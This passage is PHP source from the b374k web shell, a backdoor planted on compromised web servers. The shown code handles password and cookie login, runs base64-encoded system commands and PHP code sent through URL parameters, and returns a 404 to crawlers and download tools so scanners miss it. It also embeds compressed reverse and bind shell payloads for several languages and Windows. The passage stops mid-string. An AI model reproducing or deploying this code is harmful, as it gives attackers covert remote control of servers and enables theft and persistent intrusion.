0){ if(isset($_COOKIE['b374k'])){ if(strtolower(trim($s_pass)) == strtolower(trim($_COOKIE['b374k']))) $s_auth = true; } if(isset($_REQUEST['login'])){ $login = strtolower(md5(trim($_REQUEST['login']))); if(strtolower(trim($s_pass)) == $login){ setcookie("b374k",$login,time() + $s_login_time); $s_auth = true; } } if(isset($_REQUEST['logout'])){ $reload = (isset($_COOKIE['b374k_included']) && isset($_COOKIE['s_home']))? rtrim(urldecode($_COOKIE['s_self']),"&"):""; foreach($_COOKIE as $k=>$v){ setcookie($k,"",time() - $s_login_time); } $s_auth = false; if(!empty($reload)) header("Location: ".$reload); } } else $s_auth = true; // This is a feature where you can control this script from another apps/scripts // you need to supply password (in md5 format) to access this // this example using password 'b374k' in md5 format (s_pass=0de664ecd2be02cdd54234a0d1229b43) // give the code/command you want to execute in base64 format // this example using command 'uname -a' in base64 format (cmd=dW5hbWUgLWE=) // example : // http://www.myserver.com/b374k.php?s_pass=0de664ecd2be02cdd54234a0d1229b43&cmd=dW5hbWUgLWE= // next sample will evaluate php code 'phpinfo();' in base64 format (eval=cGhwaW5mbygpOw==) // http://www.myserver.com/b374k.php?s_pass=0de664ecd2be02cdd54234a0d1229b43&eval=cGhwaW5mbygpOw== // recommended ways is using POST DATA // note that it will not works if shell password is empty ($s_pass); // better see code below if(!empty($_REQUEST['s_pass'])){ if(strtolower(trim($s_pass)) == strtolower(trim($_REQUEST['s_pass']))){ if(isset($_REQUEST['cmd'])){ $cmd = base64_decode($_REQUEST['cmd']); echo exe($cmd); } elseif(isset($_REQUEST['eval'])){ $code = base64_decode($_REQUEST['eval']); ob_start(); eval($code); $res = ob_get_contents(); ob_end_clean(); echo $res; } else echo $s_title; } die(); } // block search engine bot if(isset($_SERVER['HTTP_USER_AGENT']) && (preg_match('/bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww/i', $_SERVER['HTTP_USER_AGENT']))){ header("HTTP/1.0 404 Not Found"); header("Status: 404 Not Found"); die(); } elseif(!isset($_SERVER['HTTP_USER_AGENT'])){ header("HTTP/1.0 404 Not Found"); header("Status: 404 Not Found"); die(); } // resources $rs_pl $rs_py $rs_rb $rs_c $rs_win $rs_php this was used with bind and reverse shell // use gzinflate(base64_decode($the_code)) if you wanna see the real code.. in case you dont trust me ;-P $rs_pl ="lZLxj5MwGIZ/Xv+KyvU2SLhj80xMVllcGJrlvLHQncY4JQw+BzlGCe3pzG7+7bbIOaIxUX7q9/bL8zZPOHvi3Iva2eSlA+UXXEFdoDOcSVmJseMkPIXLLefbAi4TvnMqZ3P1/NndhcigKBx0LwDPg/GY8eQOJEWEC5d8CtRBZK4B+4rXEq/88MbdS6h3dMlG7mBNlu9m68mAtvcqpE2/yPBFblCUfzY16PvO+arS3Do0tHMvuGFL3zvHzrVBj4hIdwuyqrnkm29lvANzIJNqYFEkmteYzO4vX0Xzhb+y+yzwriO2Cv3pjU2k9fCQ5mBaTdXLafj6reuOrAPqkcolevww/EhRT4DUKF5pFgveRJqiaCyIQv+W+dPZLLRHitJTr0/Vjt6O07SO8tIklT1f6I1ounhvnRp7RS4klGr7qhPGSQKqxrOZ1RQrnGcbjWvcuMZjnPCyhERCui4Ne6j3eAUlZqvZfGEbL/qeQR+D4HZlG5Nu4odhm6Ae7CHByumpPim4ANOz6M8D+3XQ7M6guJ1JMa0Gl0s8pAgdERTiZPTpn0ZJ1k6jZsrdvAQZxZIrX1lHB4nd31ySvHPdmlAOSdyJG23s37SZrbZJnxkWfUxab92oFaejv5v7L2GNJjhobab6e45IfT8A"; $rs_py = "lVRtT9swEP6c/IpgpmGrwaGFaVJZKiEIE9qAqu20D8Cq1LkmEalt2S6Ufz87SV9ATGiqWveee3vOd+f9vWipVTQreQT8KZAvphDc3w8KY6TuRxETGdBciLwCysQiktHs+OvJ46EuoKoiv1xIoUygINTLmVSCgdah0KF+sV/BHsGEplyAL2OE/ML9ZDAPamfMSN/3nE+89aVDIYFjFtYm8UQtbWSTiaV5ZXQ1TBwMSr0Hl/wtSnxPgVkqHjiUNhGpgjTDpLOGbLQdaCENJn5NN2WmFLzhW84DoSlPF7AXI26Qhbx5zOi8rIAL6+F5Vm/LN7DACFb19UyS0XW8MqAWp8NxNz74NPx9MTg4bbUWOq0boIvgsAy+fUYdbRSekw4KBrtCbyvZPFBpcNmfC5s6cDflJM+ol/r0lGWlgD3h7lHvxPHyYMVAmkYrU61rrI3iucpsCViRwVEDeLNYAdWQKlZgxLL7AN/9udcPHYJCFc6rNNfO4Or7ze0oOT8bJ6Rxs4FmbYT2umRqClrqrFR4RnMllhJ3CVnbuAtjxRtlq7ONAZ7hdT9aeEvaOrvRqOdJkZ2kSxOkPKsrsv9dTW0oJ/mbIEE7FpeplZpur3P1NzOD7jnqWJI5GPbsxgMNkJ/Htsk0VfmT395cTuK450Y6zu+6Dz5UO/jxFvcKe/ac3uaHVWlsuXY/Sm6wJL6Om7WhzYFb6exyenWTTNqdouPb8x/T8WSUnF1bF1uYcQohN/bj259TZ7TrMh0lv8bJ2cXFKLQZ35DW1E5ghjE6ovUHhdLdtqZVaUeZ4y+vPFw5btAC2znBOTCDcdF4bIfMLT7VFYB03pumvbdBnm6ag+rHpXkfgn7QxobMNsA1bdP3D8xRZ3dg2vXVxG/9HXP7xKQktg1kji7+F/HuR8TZ/xH/wPxd4oz4fwE="; $rs_rb = "tVZrb9s2FP1M/QqWySprcaSm6zDMmWL0sQ4FVtRI0w1DlRU2dW0RkUmNpOoUSfbbx5ccu7aTDNhoGJTuPbxP3mPvPcpaJbMJ4xnwz1i2ky/RHq60btQgy6goIZ0JMashpWKeNdnkux+eXRyqCuo6iyT81TIJOFaCXoCObwXNWFd8PIc4ikqYYtXSCxUhCbqVHJ9+ePHHp9Gvz89evzt9m5ZiwelYQTofa1r14rlaMH5tv3PGZ4s4GWrZwmA6rhVEwEtvUcK4tk56SsvEWM7NHiE2xa+ZiRUumdJqGJRGOwrxpBwWTpp2BlItPpnQrGF73EWKdQUcy1ymM9VOelmRZX1SFCTBDhbSkD4ac+j56S+/pTXwma7y/CjCZlnRxyfn+d/Znx+fHP54fnXU//5mPxs2+RuuYQayFxDJwASr3RmVn70cvQf5GaSLk5B+kzgNzVU6phQaD6RpIxnXmLhuYNcNPMBUcA5UQ1lw4nATmDHunuwygXKhQy/wyprm1FaBrQnhEihWzs+0R+CyEVLjs59P3+aXGuT8ePT+KI+L/dHvr4qT+DjojfDY3SVV4UOGi5+Kx9+UuDhx21O/k/7UfpKlN7CNXXXdpbfsMUlJckBOyBpqUZlO49rEPgO9npBdcswUYJBSyBdS2ORr24ySQSGH+9kGPlSnTmkl5k2eE7IBCTBrh5Y4/TZjWyF21Xkd7o5BZqwfx4k3vPNEd3VLMz9UC/ll2KuTnWjvY1mge5CvmDTejeW7gPYy79I9rCNLS7UKZSoWgzvLtC1pX6cHJ3Qf/D9NC3aaevMubUQDvFf3iSTJ1TUT1515JizblAfEzOXBhq+b7c62hP21bPW9e5agaHt77w35LekFuGrlbQYqpbVYyUjlnNVRZ8v3cI3YnjqC3EFsxtEmtR0baZW7t6Nzw7G2gCEgT7ie8dyPh2e8vavqxrEeUg/gOOQJDqE1akMITQ1fOkZD1t3/TWSoy2wZ9OaFMsqOsJQnLCNB95CUix9tYSYU5KtU5GRoN/Gg7tAWmkHd4VVGCcI18vAi1zu37kzY1eUrJtgdRTfIm27XNf/GOQTktulUD5zONadh91v4M7B14FCYNhulnzPz5CYMhfHyk+fAVvIP"; $rs_c = "rVJhb9owEP0Mv8JjU+tQFxPaaVJpKqFCJbQVEGSapg1FwTHEqrGj2EzQqf99thMYYdqkSf0Q5e7d8zv73uEmSLXO1A3GRCa0tZJyxWmLyDXO8OLqw/XTpUop5xg0cf0tE4RvEgpulU6YbKV3FShnYnWKJZwtTrCdwnqXUfUnrCR5orqKC6qZ+TATVXwjmFG3GBMarGMmoA3ifEUQSeMcNE3449vc+1mv2YJCBMnA79Zr5qIbYgDTLE6SPGICMAOzJbSHg6Bjj9RYSzERLeM147ug9xANR4Owe8Azmesg1VIoGGvJoOvlzz3vN8Vqt5T7OSaHw1Gv359GvdFXR1NB8V5YqqPZ+P5jNAung94jahcUqi1HZhoqU/4UWYpjRtPB59nA6qEziRR7pnIJZdl/Cd8oj26ZhoXMgonECMCTl4Omd8ZQe+sXLG4GSoXhvXcpCWJCqOvcPlzH6BDUcHsB3F6AG0CkEJRomnwXDdS5LrnJJusYbiXxj5NOIbkzTdewQbd2pCAcTB+Drab5ujuZ+cH5u8mX/t15t6wayISUAGxehFUKLlmjuCuXikJi45d6jXJFwcHOq9e30y6kiwpiZ15M+Znmco8gM2tuprknXPgXx8he+587MJxMpuNwHIX3k72vsBz2X90sN+Gk5nnebft4I5yT6j+cVNXEP05e30lVOPlS/wU="; $rs_win = "7Vh3WFPZtj8pkEASEiQISDsoCigdRkCDJAICChIBFQtCGhhNMzmhSAsTUEOMxq4ICg6jjgURlSpFcChWHBsKKDrohRvaIBcYUc8NI3e+Ke/73n/vj/fe+r619lm/Vfbae/+x9zphG9UACgAAtJZhGAAqga9EBf57kmnZwLraALiud9+mEhF63yZqK1cCisTCBDGDD7IYAoEQApkcUCwVgFwBGBAeCfKFbI4zgaBvO5ODHggAoQgUYE+zCPtP3h6AiMIhkN4AqFVIWhYBgHrfzISFM9VN48ivdSNm6v+NSmdivpq1BM7opN9x0h8Xoc1HQQD/47SWHu3624foDwUh/7a/PVo/t/8s47f1z/q7H/Wrn/vviyuc8SH/za/Bw9nVa3pyG4IeUp9qnPRJj3lrQx4bAMQGWg/tqdgigPDWOBheq3gnH8AWjTCoQBvcE68m9g5W1BMiSZ4taFu64aw+BGBINqgZTKpBY/R4aIO9qsCRFu2cigD+EH/KllQEutq2YNFoOsYDqNWUP9A1wc8f08W6kS4VYYcT4VfknAbpSsJ1pbGtu4KExznKe1+MZ9SMYAibzW4qfRTo5V++bBxAF62KANMUTXNvKywmJqphA0MLpWXPle9CFir9Sfay/MBq3j0j16tCa3d6vxAGVNACAJ5iDVebViN/go2fMMYAC7Xq+oJ3u8juL6wRLt3CinGyMhBbj/A9YNiQtNRXpSs+MWT5alWNh6X9cmyNSRec/kQ+iSBmw4TZxJwLGLeGT7UvvshvkzfFNKJph6ENvkd1zX0PTX2pei19o7nhq4O9AgX6WhrdX19jqUagIUkkVEq+NSTAqBLL2iv7Yc3pKygz1wm3zv5tRF8cZmlqzZoD2QLQVO3Xv5nV4Yh1aV7n0nmAkNjvH4ZQtnra2WDEDHMc7u41azE2p1OqL+7/og4zHTeFNENqYH/Zz5avjYkBSoIjkNMGuV0GqFbNV1JtI+C50QSqn6Fjre9zn7ez9ezcb7Y1VY4/fDn1WfPPcPz69esiK/fO2rXM69cdyU/GTN0DD1tLaoSKRlVBcn4VZpm/4vWHiyfiJa9bcoxIBL00tEdiqvN8GXpzkIKck+9n9nqH3DduLyKDXBTwitSlaI7fPzoYBurU+bjSVDl9n0uWPnA2Pdygh1/khxow81u0HEnc3xtDBjAiXbNeEh67alfbUcaqAL9whURCHMy5Phg/qDFtuD24G/Kqz+gYzCke7EUr16vv19YS+1YAs1OV/PIFXfEtHiuIFc2Poq99021Bibd8qdw4NBZ/7uXGFy1Pl+anH7XAc5Hn9V3mpCViltqOrEYeLOgruNToPnGfOa64UYq9SsS5xxEzXVXc1kr741dj3ysoQsdt7zqMhrCN/Y+NSHb3DD2Hfl2wSRTc5dnowBe+Hj6uVEWpbtBLrSY+XNh8L3DOF3hP/Up9ZQRe6a5o+VCMaH0Tg70ycBJ95/JZzzTTuc2FhnDgkQPvX+yNOtIahR7mJalD//nlXHqxxjCNX1ll/m07Ym1B4JNoaRelt6kM2dPLRSMMA7xw5+53VO1wvDRaMnE2NXngUYhivDmbsHMzZrD6LDeP088aSrb+51nzYi5/WINhF//AzRsBBpxP28Zeo5lcRlsetr2UttsruMkWRFmYYhal2rDVJASm/h/bN+pG2VNMZyMLCgSnPPWw/c9DiJsPvazvTOpvIao4Y5u2xLY1rhq1bKrlm/D2dNTZnx7+8P2B3isjazfvFPoBxNLd+49NGRYHN50cPZ7dtoRNcoUuHTMYJyRCJIPbskoq25eSUj4See38sCvgCLSC8nx7W5BmkN0I2c1DUp7FqUlwZK6uK5VgNO+YxfVH54Yd50N7lwbk32wPdokuo5xbrP/ldT9nuL90IblFRwzUN4FwCfWBBrEi14pY3tS7D64dyRjK7oRCiuZn7qZ+h1VtQciWjQjrP8+Vmmh0svc4+eeiKPh/+WvMZenPY8u6+U8tiXsCnwc0QO+avTqaK1DfSBCaM64d5++ll2RbLzXDVJppLE6ibtvcrj6Gtewj8amT8iZ5OlZHiv/RwvyF/nUhBZ5vyjwJY1zZapou6G2hlWaOnuRAXTO2PcWWr2l6y7bOz48O/Qa3+FUFrpleoF/g1v4DjvKd24cdtr8SzwQfK5djhEKD8WZEj5yAtzdZxCMm/pSCQ040WsoWGszbnaaLBhBYZHrwBxtS1ls0OH5LmDp5yIEqewdKnZ/Ltvvqpg28f5VomULgJdt4UyH9LKKdcGgNflNMk0zSbGqbl4ADEI/3B3+ulx/LVsSMRUknFc8U6Z8UD6UEZfTW7nKS0kCJH/BraF0V0jOW8g/Yhnf5x+V2iZSu1IuDj8pvOKCTbBf20ozieLS6J25Ug1bErdCYuxBpMdYgyKXNo4M0QN27O+iQ5sgJrF9/7KB+8V3PVk/vz8XR4cu9xkhj3qqbdrB9Ecn1eZdk9G3Po2uvVnZ21lU20Kyc0FkYi6mkqRHHOxkvDXA1szPslb4YibIezoGlVspvbuuNS8kNrbRJepJypOYeVh2rNOrGZ8ZmQ0uyppwkeXW5ivSecjjavAqdjxhRklBG8qbPa4sSanTufLygH7pQ3P1sIuxB+36HjHp5KhYRvrO8qoQVYeKGtyPKK+B9llfWaTys5R9BKBWNhVLrKgajHR7qkrp7IT8jQWT4Tw/w0T56W5S476PfdndGxowgfnFR+khrD5EGrgwNn01e5XBHRVlCrTqhWtt7in1wMFFT50TKtqQgMKM3iIUo7yRjdO7Q4LNHWXeYsDviY1+vpsSgdOP4QbhWDdSfLzqssR/IOG4iZC1d14VX0c9TQWMcKVtFIPW3ycsf8vnJSz9UWo7ZlEzBuTmX62uFF4xUngXEYXi2fAgtf7S9Kb5FOk5st7gz6nebtGpTa1RQc6KfiwJrNjie4Y9QknPcJqUjB1yuHzAnYPNAOjKpuVHOI4JtmqxDoXxv05qL4/COT4o1GY1jcUgkZF/XPn9DA/qEcJmR7KPevLvx5eA5LHhqrn78QDfkM1vRDq0gH+GIUquHd0lJGgqFlN3wEHLuzMgqv4Xw5+lJ+zRziBTvS1mdPH1DS+not7rW0l/KSaNR8yD6uEedrCGHuAdCP5c+cZbvy+uyVUP4R9hlRYgmHAZDF2yYF136slbF+NS0pj/QJb3xh8RUaJwhPZN5p95KL8e/8+cNDz3pYKUujxp88PE10VDL47irIXYxV7JPdx1P83UMTmtf++BTk5t+eJzG4OK43ojPy8GYyVVZj96slC2hnVM8IGKq8fwpuTddOu/KZEmBzubX6kM0Was5cwM6xQZNo4zZ7fsla+BexemqM6U0xfN5SYok68D6qw78OtnCOf9ql0dNZa+J/+7Bq8tgwgCd0lSF889Meno98EILCtfib6q0CF9drmvvGozlVROXvtINLbTqvLEuJkeqczWzv2K+Fep1sOKlzZ19CLOf5G/B9ebGX+SNtD0kn5HhhYkXfMQdTQ7nn+9H7414Dez6dnB5XKlPE0RNFsxDhV4KcLV+sy7XeJl+4AZjb+XbdseT2FDKdyeymlbTNhJpmng1LiW5Q9Pudox+htbS2LnmE3bH/oLM4VKxcVY/Rq4HOJGTNA77z1ZU3yIpXtxTYm/SjeVp72aFtzIw7fcM3FvBrj4ssxe0Cx9jfEIz8ykpox0MgDnAmNSa5KV78rUSX3i9WCvdz1/K1srWw8dvVmoHUL1XNu2zlRc37cPeLDrYg3ePhkwKS1+IkDchkpHhUMN7SRqlk9axDICtzy88CEREhkW2f4HhSCCCwxdCHDCSI07ksjgSMIwhYCTgZV6gqfVC9FyqLup86/xeOGgNgsdlJrC2xUqcd2vj2DweELsyMTaCk8CVQByxP48hkXAkRMdKcv5mL1MjVObU8ClnZxektjuAuHyOi8hByhY6iTnwIDzFE7KcWdbruGJIyuCtkYakgPYMNlvsaN4BD4ILmCgJdydHGG/PdHAIQi5OnFq8h+Xk6YxwcznCMoIrYKILSyiI5ya4cD28F+NSEvhcQYKTZCsD5g8I+WwnNgNiiFxjFoBz/YVSHlvYCY8L7CDQHBJzOYkcUMA4BYrAIP/U1AfV/lHgYhBECflz5eOl9d2OTsuOg76+hbGxXEBZgI91iA1kCyuivewlfDxr69zdw6vZgsmdgJNlaMhy/4lBGN4QFBayOsgpMNgpKiDMzSlyZejKOVHBEU6zycZxY+s93I8V63/LM+oF1shKOUcsqCVx6HjHc6VtFFQAc+Njz7DHvIx9lxrullTx2pl2Qx9ReNYcLei5YHFwNG/anKE+W9d1f7wsrHecFaTLRs1eMG32XEHfyPwtOlmWe9C50zMsr7ikkr2qkZt3dns76lXfyJdOz/tlWI4paO/OGY5iLFqIssHNj4wDfMsCX5DjtN1Y3ElS9BFUSxyKrlOOBE4gzzjqHYfvwmWyNQgam02DhHyav5jDgDh0sbA0aROgJyEGJnMhwlh6xyb8Cq7ALogD6a3mV1ybxSD44/kMq1BWp/WluaRQhgQKFC8RE8K6cc8+C9lSHifYhme9NkmcgfuYuoEYCTG+EYUI4oV8Ie0hGJmSyw/g2rDKKs7WcMUp8ZHSCI4AMv78rNlqrWDrBnbJDyKIKxRcrpp9/QKvxYJM2uyF26Z7QAJ5bUimtRGLMN+HYSfPRfvzhBIO9nO8//GLhuTqcNGuMGxlZqS/LbEUDGizpBnqnCxI94fEvGDxDyabZkvuD2ROjPkamECpqCXvJaKN5eHXfHy/L2uNjU2BXiYtIvO4jgkSAxGy8Vb5M7lHl4AQzxfsFLq85thLYhkiQyhFRNz1Ps/maRx2y/P7eZtEGAemjpdB/YepAWcfBlNox4AwQq4mbxFOL37OwUMsbN2igJNZvF8wHD5LlHI/vnOLhJtwgHeulhyx3ih+32AkLRLc7oDr+faFNxTGKl7NlDS+Zz5kSezwuYJCszMVzm+2mkDMlCaD7oEy2VYBT/cXHvMia3BYI9kqhdjCJD1tj/0Udt2ZEorQ0TbZc79219sFYR+0HTYZRGJIhiSbM6Jr51ypOJNrTRY7It9QRHhR3bUOhwVWVBKG5L7TxppACtbN7yh5s9C5GMJgZ6nPuGxaTL6dR49z7pjY5ZM+jn5iavfjqdoYqmmDs9i+AUFK+Hgg325OHNWZWXXycgwYrqbLHML7X2EPcc3jzidZkOXoRW4PpltVQ0ANAPDvPWpcnbGMCqjqNPtheL0Gp87VXbEHE4TolGKUVvKhT4ad4sHK6Xb9D4hhA6JTMizVm1ElvW5t8j6UmHCrB6uNlo/AEKT48Y/+bX9SpCDtL8Y/JZPfQmZ9Bj7AsPwRQkV2kX/+lEjMRS7XFhUinehnwTCsViLljWgFRt6Clvejk35BPOwP1cJbFBNVcm03Xto3WiI1kfkhpBNKTPytPuytBtKu2w6TiJGLmp9VdUAcACgxeg0QRRmLVmW7Tm8H4gNd3oKFj7K130dyMUHYBqhL8ev64NGStfDRrVpQ645RoORNaM0b+GiyFlCW8LRSm20Ehmum/wHQo7ahI9fDT1W7T2u3SwZmyuLsM6PpUfRpMJqhCrCVbQN8bks/ygdk/ZgsGAb+n/6v0/FCAGAX/hn7XqvL/oKVafU9f8Fqtbq68L/O26rFn2n5vZbHtYwuAoBZRV9t4MzoPDN6zoyrAiNWB4Z6uDsHhIYCtIB1NHrIjMKXJLLEkPP082J9pHvsDAoAoUIGO5TLFDPEKTQA0N4/2quJpb2sxByJBABmnhJaDOKwoN91Gk/70vhdWyHmcLSZpm+y6eDfAoFwEUcw8/TR5o3lCpkAwOQK2P87zvzf"; $rs_php = "7VRNj9s2ED3bv0JRCayEai3LDhBgXW4u7bFA0BboIbsRZIqyCEsiy6FqB9397x2Skj82zm6QBr20MGxTM5w3X0/vh7eqVtPvgtoYBTdpymTJZxspNw2fMdmmKl0v37zeXkPNmyadcq2lzjVXUhvRbaJ5vJoCN7kRLc8b0QrjTHKdi1Y1ggmTV00PdYTGKTGF3nBDiQZ/Wo0moHyvGkwdhUGYDEYMIQxotly+wdOuoF3fNHjihxPUNMRArCX47adffqZ7w3W7evdrRq/uyLvff7y9Wg1utK3StehSqINrEWJsS0PXWeA6C24CJruOM8PLuw79U1FFTPadicYSY0qz+K/phChKxvInBCsI7b9BONGVeH6c8gb4pfDFeTi8n997iIMhux+xCrZ1WLaOqu+YEbLL+V6AgehKsc40eSX19ir2mKKkR6Md9gTjnJleZzHGmSg7sXrLfLAoCWKf4xpBlFF8HuErwJKG/lw6oGA0L9ocJNvi9oHrP7mOQsMUUmg+c5+bcEZUQpAxnXR/GGMTjqEDa2SPM4Jk6Yoh7AlywRhX9sJQKnqNbOQOs0G/xqcI6Zv3XdHyKE7myTLG+sOd6Fyhk2qnheERYQlpZzhhtsMGZ+FtaOEmu1o06FSvKK0K3JkLsQuq7DIwyt1yE9J8k7eFYXUUpqy8C6L3H+7g/vs4FUhX7FLr2EdPSFkiwbVfpY8WkJdCR+iJY1aPR+8mkp7W5YyP9mcgkdGiPe2aKNeh3U8YPDwEn/H/0aM/DtY4y+1qhAswGd/bjjEXsnz2SeaTeUlXoC2lYo0EPo5jfHIbQbcFfjpqd5GUQAuti4/RnN76Q6iE4mES6jBOsqfGHRoXF4weTGmqtGS5VLzD5HWC8Dh5oZwbB/UKp6w5yF4z2yHu48j6U86tG2SWlS4bjG9gMn/+RvbijcWzN9jg9GQzuh9oZt9rLis71ocHf/Lp4vi4NaKLYYZ2rkM5Q1JPoEPOBrUrwvsJKiW+bkViNfJAYNHlRxxdHMgqaIXxpTMzGDg5rnIYEBHxkZZnWGNBlwBH3yeo7AXAxTOAi5cBH885ekLe8ejbOn/OnjwP43WUG83aM/6g714UrVAPolhZ0fIErZ0q8A6/o7Z9vXrBV6kX/GfVCy6p1+f0Cv7Xq7Mb8JJewZfpFXwjvYLLagD/ml7Bt9Yr+BK9+sci9fZ2+jc="; $favicon = "AQYD+fyJUE5HDQoaCgAAAA1JSERSAAAAEAAAABAIBgAAAB/z/2EAAAAEZ0FNQQAAr8g3BYrpAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAphJREFUOMudk8lPU1EUxvkbXAMdXlug2Kp0eu8ViiUIC2wZJJYqkwUqFiqUMjqgAQppUnAIiBKmFoq0thYKBI0GBGMw0ejGxIVLdyYmYDQ0xPD5HokopmXh4kvuyb3nd853ck8cgLhYylymkblIadlzxmNVUXpAuf3vmwOB9pma+DvWhElkhFRhy4Cer/YpaugZ+bdDASfZiktU8+84PaiKqP3Kr+YbOd6CXnqbHpPtltjUzpgAzQK5mTFPRvZaDpBb9KwClFcOyi1H53oT1j+H0O6qgK4mrSUqgPGpTX+khMZHbuYFTiH4YRxPPk5j4KUDklvJqFjOh//1ME70H8VxZyqkDjFTdZ7cYnzue2d87mZ6Kcy+u42epyZcDZegNVwJzTAJiTMFpmkDsgtEn/Y7YHzuMD5BP1R4NF7yy9lgAbxv+3FzqRz2YD7KprJg9BfC92YEQ6sDkHanQG0Uhg5YoKblG6RbBnJchsD7QXQulqIpoEeZWwvDjB731xywzxrwYKUXkk4xxB2i7ymtQuuBGZCjsojRVwTXcysa/TqUTmSh2HMa91a7YZ0qRNVYLgNwQtwmQrJdsJvUSEBUz/8zQNVQ2o/aoAl3VtpQNpmNMxN5cC22w+LRwzSaC8e8DQ2TFiTZBEiuJ46wOYSZe20fQN9V9KW5JOhaakPxuA6uhQ5Y3DpUjuSgZ84G6roSostM1TqiOuY/kPUdWyOauRh7MYiuUD0uMqCeuUZcmWmBsI4PQS0PRA03wjdxmqMCWEmvitekHWI0uGth99RBahPvJQrNvGomUcurSNzkliaAcy6eiApglWoXuZOs/J+CS0xFMxf8Ks6rWAsXd9g2suJf4GzwyhPBPZ9A/BeAFccYv5NoiN+KdvcLtyxxEwhxgvoAAAAASUVORK5CYII="; $style = "rVbbjpswEH3vVyBFldoKEBCa3YX3fetjP8CACVbBRmboJov493rAEHNJVpVWfkEwnsuZM2f40eWCg5OTipXX6HfScmitX4ILu6GS5X0ismuXkPTPWYqWZ9HB87x4uNKwdxr5QX2JU1EKGR3yPB+/vFF2LiAKPa8vZJcImVEZ+fXFakTJMusQBEFPOn0rTJ+PJI+BXsDJaCokASZ4xAWnPYkK8ZfKyfT19bWvJe1qkmWMnyPPeq4vfS5k1WWsqUtyjRgvmboIJCmpBYVdd2krG3U5ozlpS+gPFWF8UZDv+7FTiXdnTNSRJGNtE/meqmzn1RvLoFCP3td4ykNhMGRyKChR5t1QCynZmUclzSGuiDwzHnnzBW8ytSDrHnwt/O4GdYDRFbbJHwYOSMIbrDySAgjQb45/dI9PGT1/H4t5ZPAwokVsl15qBTgtWQNjB6y5XarJCkPK2w2Gk1cL4QgRDkkbBXn3H+BuuaLpgV11ipFX/gktV9F1eoSQWyIDP+YiQ90lF0tlPBeamQ72aCekdnMyXGBl6BYzGP1AUjYWyE6nFqggscILWEpKTYGKZVlJe/dMrgpag846jjkyT2pkBpNP6XNJAVR9TU1SnX3vYusqtmhe8IIn/ngedxyupeBT8t4hTLjhC77ZEHnu8Vimlg+z2OMJz/08P0pz/t67jNctvNtuLUVVg+3CBYikZDMYmtTeVEAiAERlMu74gueBrBoE7HW8bsObKb6hUJqWxycPL44JJy10q0iLjF/wrNiwq+G3QcNpn0Sj2xFIbIs3Wygx2VX7+bsSxbtQYVxTDPYmDkQdL3fEzXWxxm1RPHqfbp4mLs135Q6f/Gc8vdvQSu3OK5s30TAwO0rrovRYw4IyoVqS+/RIC7XTAdTZ8fPYYHRd2KrKbY5boRnNH4OtrYrA3Gop5UoHTL7+XLMoxbMWjNNmio032/A79S4U3ffmouf9lKapUlBG33K2C/A+o4yVMXB5cvAhFXdgNolpLo6F41RBp0Ccf2V8f1auayIun7Iz7+MWLoJhc+/3IAxXWrDltKWHjAtg+YJ5+op2gL+O2/av51H7Py7orTO2gjnOreUecjkXApa/XhI9mhxFsHY2mPZijv5qw9sjTurJINRIPFuPhz89yIUA9F/+AQ=="; // http://www.kryogenix.org/code/browser/sorttable/ - this makes the tables sortable $sortable_js = "vVhtb9s4Ev4eIP/B0XUNEZZlO+19ONPcYNMXbHHd7gFb3H5w3IKiaFmJLLkSnWzO8X+/GZJ680vW7eG2QGO+zTPDhxzOjO553lmwi6F3yy5G9PysyHKleJBItpHj+ToVKs5Sl2x4Hq2XMlWFL3iSSOnHT0/u/iBbeHfdrkgkz9+nSub3PHHviBdmQi/0RS65km8Tib1utxqPpLKDxfXjJx595EvZ7bqVNT5ng8/uTXgTXpHpzeDG7892erpLrvTfFwMvcZ/Fdh0N6xCv2iMnm/7ognFfJLwocJFfwDbEwh3cBGgICtwEA9Lt1mbdgdiWELL17sZNpCEDoCOKF5KHDvETmUZqAZuEAXaYoGqxB78+X61kGr5exEnocj/PHorpcEY87sdpIXN1LedZLhENhuZxXii9lBCarpME7VE/AxgotK0/sxDR4UbEc3dUSWu11nSyQR6CTKlsicNsOqNggnsPVypgQxpMeHM5DXo9YhjWtgezo0wbTMO121YybXct9qwGJRQMbi8im4qBd1mmkPJ5dpzyOaxxkNcm4TAKTOL2zNYOmqG3CCtbkjv2o4WhTKSSnfbMFlmHRotqOANfyCQpGqrtuqZO2PKFHW7zuuSqplVf2S9phm0kl2zcJUyzUyXdKe//Z9j/x6xHtHi3e37mZvcyz+NQMoSajmB3DbiVHu12ndI3HMbU40pm804FO3Ww+cXplUizq2fmxrXv3brcC1rqMhY0uwKpvM7CWCKPFO+laGzWk6wG+8oajx3QiRdVLeLi6B01lGBLhpqNGiuXYG2Brojy6LxNnF3YXK4SLsDtdlEdb2/oi4V2LGgul8CMuWcH3rvrx/fhLu78IYxT8G7iYQ/woHfUF4oVT53mSj8O2Q6gmXA8EzvKZWkq858//fKBOd00KFa0+7c/Lv9+/Yo6xvBdBzFihMqkkJ1vpb9k5f9zDBXn+8fxPxyDZc0egzmUU47BrDxwDPZcW4sOH8LbY4dgxMwhbFT5HOmlK56DJR+zUNLELad8gaI4WMDpN8OfDhgpTHwCZ9cRp+adfyPp+in+RnEtBoGZuofYPdFBTJy3XNYEtE67SZt7yKFOvAVGl3WeZ3SVftK+vD3mdPYooCdfLHrKxaIHL9b52e7Vos9eLbg1X3ie80dMFkSWmNuVUZ0/mE3puFclEhxCHp80YyyHeFfBTKtWlQlM6xcgdHUM5TaGTkEhJEx2bFYb46OIeSdWwG1gLdFGVAa01GgrVNDaZ20Un+lAaMN8Nb7dYm4ifB6Gb++B/w9xoSQwSfaHXEcksbhzPOndWoeU/hxSbvjLUtBNhR9AF/6yDdxzpCpi0PO1HI1grtGHNZ7ws1R3wB8jiIesGoDEJpoC8IxJWg2y1Rb+ebeNtBairU755ilrFAp+Uh2WAK7EpBl0WwmgMJmKkn8o1jykPYGpKE8MsiVwZYgFIKPjMjbK3ORz/2p6sx4O+csX+ufVDPqh5896P1y9gFCQS7XO09oz/BT5X2VFEYITsAZUo86ArEgnzwy8sJBQxFQC+kwLKTJwqP3JS5N5ji4nWnxfeWSnDcL+/JJabhsi221j2TzdemGrysC0j1skx6ELXrxPV2tVsAP51uFkv9s9VgTEiFSVKWg7nsP5GRxWrBJZ2m+7en6dhnIep/D2XNRakeXXGdSCWO9dVCY25OsF1YM++HxT9J7g/4tBhE/5cXj9FH0CiMPg1fR3QKujqOpZwOIhxjtVB0CyERzSmpdjVGV4LeOjDmMq+5A9yPw1LHJJrQVq57U8rkZjvhpXyxHu3yeIjMbmZzSuizXH8Ur